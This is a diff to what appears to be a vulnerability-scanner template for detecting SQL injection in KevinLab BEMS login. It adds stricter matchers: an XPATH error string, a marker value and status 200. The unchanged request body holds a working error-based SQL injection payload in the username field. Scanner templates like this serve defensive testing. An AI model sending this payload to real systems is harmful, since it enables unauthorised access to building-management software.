--- a/vulnerabilities/other/kevinlab-bems-sqli.yaml
+++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml
@@ -25,7 +25,12 @@ requests:
 
         requester=login&request=login&params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
 
+    matchers-condition: and
     matchers:
       - type: word
         words:
           - "XPATH syntax error"
+          - ": '\\ZSL1ZSL'"
+      - type: status
+        status:
+          - 200
